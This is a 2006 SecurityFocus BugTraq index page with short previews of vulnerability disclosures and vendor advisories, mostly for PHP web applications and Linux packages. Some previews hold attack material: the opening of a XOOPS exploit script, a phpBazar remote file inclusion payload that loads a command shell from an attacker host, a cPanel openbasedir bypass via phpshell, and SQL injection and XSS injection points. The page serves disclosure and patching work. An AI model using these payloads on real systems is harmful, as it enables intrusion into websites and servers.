BugTraq Mode:
[ GLSA 200605-15 ] Quagga Routing Suite: Multiple vulnerabilities 2006-05-21
Stefan Cornelius (dercorny gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
[ GLSA 200605-14 ] libextractor: Two heap-based buffer overflows 2006-05-21
Stefan Cornelius (dercorny gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
[TZO-072006]-Xampp - Multiple Privilege Escalation (SYSTEM) and Rogue Autostart 2006-05-21
Thierry Zoller (Thierry Zoller lu)

_______________________________________________________________________

XAMPP - Multiple Privilege Escalation and Rogue Autostart
_______________________________________________________________________

Ref : TZO-072006-Xampp
Author : Thierry Zoller
WWW : http://secdev.zoller.lu

[ more ]  [ reply ]
XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit 2006-05-21
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on

<?

echo "XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit\r\n";

echo "by rgod rgod (at) autistici (dot) org\r\n";

echo "site: http://retrogod.altervista.org\r\n\r\n";

/*

works with:

magic_quotes_gpc = Off

register_globals = On

*/

if ($argc<4) {

echo "

[ more ]  [ reply ]
Firefox 1.5.0.3 Flaw - Page can obtain path to Mozilla installation or profile by examining JavaScript exceptions 2006-05-21
milw0rm gmail com
If an exception is raised in some extension in the user profile, the page can catch the path to the user profile, and so a remote attacker will know the user login.

PoC: https://bugzilla.mozilla.org/attachment.cgi?id=164547

[ more ]  [ reply ]
PHP Easy Galerie Index.PHP Remote File Include Vulnerability 2006-05-21
craziest gmail com
Vendor: Power-Place

www.power-place.net

(PHP Easy Galerie 1.1)

-------------------------------------------------

Author:Craziest

Contact: craziest(at)gmail(dot)com

Vuln discovered by BrEakerS

--------------------------------------------------

Method:An attacker can exploit thi

[ more ]  [ reply ]
Captivate 1.0 - XSS Vuln 2006-05-21
luny youfucktard com
Captivate 1.0

Homepage:

http://new-place.org/scripts/

Description:

A basic but highly-customizable PHP gallery script with optional thumbnail creation. Designed with screencaps in mind, it works best for large galleries of same-sized images.

Affected files:

gallery.php

Inproper filt

[ more ]  [ reply ]
[SECURITY] [DSA 1070-1] New Linux kernel 2.4.19 packages fix several vulnerabilities 2006-05-21
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1070-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze, Dann Frazier
May 21th, 2006

[ more ]  [ reply ]
Destiney Links Script v2.1.2 2006-05-21
luny youfucktard com
Destiney Links Script v2.1.2 - XSS Vuln & Full path errors.

Homepage:

http://destiney.com/scripts

Description:

Destiney Links is an Open Source project written in PHP for use with the MySQL Server entity. Links provides a pre-built, dynamically generated, Link site. Links counts referre

[ more ]  [ reply ]
Destiney Rated Images Script v0.5.0 - XSS Vulnv 2006-05-21
luny youfucktard com
Destiney Rated Images Script v0.5.0

Homepage:

http://destiney.com/scripts

Description:

Destiney Rated Images script is a continuation of the free phpRated script. Rated Images is a web application written in PHP for use with MySQL. Rated Images allows visitors to your site to list thei

[ more ]  [ reply ]
PunBB 1.2.11 Cross site scripting 2006-05-21
k4p0k4p0 hotmail com
/*

---------------------------------------------------------------

[N]eo [S]ecurity [T]eam [NST]® Advisory #22

---------------------------------------------------------------

Program : PunBB 1.2.11

Homepage: http://www.punbb.org

Vulnerable Versions: PunBB 1.2.11 & lower ones

Risk: Low!

Impac

[ more ]  [ reply ]
[SECURITY] [DSA 1069-1] New Linux kernel 2.4.18 packages fix several vulnerabilities 2006-05-21
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1069-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze, Dann Frazier
May 20th, 2006

[ more ]  [ reply ]
Hiox Guestbook 3.1 2006-05-20
luny youfucktard com
Hiox Guestbook 3.1

Homepage:

http://hscripts.com/scripts/php/gb.php

Description

A free guest book script that can be added in to any html website with php.

Affected files:

index.php

Exploit:

The input forms for signing the guestbook aren't sanitized properly. This could lead use

[ more ]  [ reply ]
Re: Zix Forum <= 1.12 (layid) SQL Injection Vulnerability 2006-05-20
farhadkey yahoo com
You said :

"By PHP Emperor"

but this was a small advisory/exploit from KAPDA by me :

http://www.milw0rm.com/exploits/1807

http://www.securityfocus.com/bid/18043

and also original advisory :

http://www.kapda.ir/advisory-327.html

[ more ]  [ reply ]
[SECURITY] [DSA 1068-1] New fbi packages fix denial of service 2006-05-20
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1068-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
May 20th, 2006

[ more ]  [ reply ]
cPanel OpenBaseDir Bypass 2006-05-20
i6d hotmail com
Hey

When you try to run a phpshell and open BaseDir is on, you will see that:

Open base dir: /home/***/:/usr/lib/php:/usr/local/lib/php:/tmp

Okay.. now run the phpshell with user

like that:

http://server.***.com/~***/phpshell.php

you will see that:

Open base dir: OFF (not secure)

-------------

[ more ]  [ reply ]
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability 2006-05-20
i6d hotmail com
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

Vulnerability:

--------------------

SQL_Injection:

Input passed to the "layid" parameter in 'settings.asp' is not properly sanitised before being used in a SQL query.

This can be exploited to manipulate SQL queries by injecting arbitrary SQ

[ more ]  [ reply ]
[SECURITY] [DSA 1064-1] New cscope packages fix arbitrary code execution 2006-05-19
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1064-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
May 19th, 2006

[ more ]  [ reply ]
Re: NSA Group Security Advisory NSAG-№196-23.02.2006 Vulnerability FCKeditor 2.2 2006-05-19
fredck fckeditor net
Hello,

This issue has been fixed in FCKeditor 2.3 Beta.

Best regards,

FredCK

------

http://www.fckeditor.net

"Support Open Source Software... What about a donation today?"

[ more ]  [ reply ]
[SECURITY] [DSA 1067-1] New Linux kernel 2.4.16 packages fix several vulnerabilities 2006-05-20
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1067-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze, Dann Frazier
May 20th, 2006

[ more ]  [ reply ]
Xtremescripts Topsites v1.1 2006-05-19
luny youfucktard com
Xtremescripts Topsites v1.1

Homepage:

http://www.xtremescripts.com/topsites.php

Description:

Xtreme Topsites is a popular topsite PHP script for websites. Most commonly

used across anime websites at the moment. The topsite will count hits/clicks

in and hits out and will rank them o

[ more ]  [ reply ]
RaceEventManagement <--v0.7.6 SQL injection & XSS 2006-05-20
Mster-X hotmail com
============================

Discovery By: Mr-X

Site: www.alshmokh.com

E-mail: Mster-X (at) hotmail (dot) com

===========================

Example:

/nennung.php?pid=[SQL]

/nennung.php?pid=[XSS]

[ more ]  [ reply ]
ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability 2006-05-20
i6d hotmail com
-----------------------------------------------------------------

Vendor: ActualScripts

URL: http://actualscripts.com

-----------------------------------------------------------------

Credits:

Discovered by: 'Aesthetico'

http://www.majorsecurity.de

------------------------------------------

[ more ]  [ reply ]
Interlink "news_information.php" XSS 2006-05-20
Mster-X hotmail com
==========================

Discovery By: Mr-X

Site: www.alshmokh.com

E-mail: Mster-X (at) hotmail (dot) com

==========================

Example:

/news_information.php?id=12&flag=[XSS]

[ more ]  [ reply ]
Re: NSA Group Security Advisory NSAG-№195-23.02.2006 Vulnerability FCKeditor 2.0 FC 2006-05-19
fredck fckeditor net
Hi,

This issue has been fixed in FCKeditor 2.3 Beta.

Best regards,

FredCK

------

http://www.fckeditor.net

"Support Open Source Software... What about a donation today?"

[ more ]  [ reply ]
phpBazar <= 2.1.0 Multiple vulnerabilities 2006-05-20
i6d hotmail com
Title: phpBazar <= 2.1.0 Multiple vulnerabilities

URL: http://www.smartisoft.com/

Dork: inurl:classified.php phpbazar

Exploits:

-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls

-access to admin login and password: /admin/admin.php?action=edit_member&val

[ more ]  [ reply ]
[SECURITY] [DSA 1066-1] New phpbb2 packages fix execution of arbitrary web script code 2006-05-20
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1066-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
May 20th, 2006

[ more ]  [ reply ]
[SECURITY] [DSA 1065-1] New hostapd packages fix denial of service 2006-05-20
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1065-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
May 19th, 2006

[ more ]  [ reply ]
Copyright 2010, SecurityFocus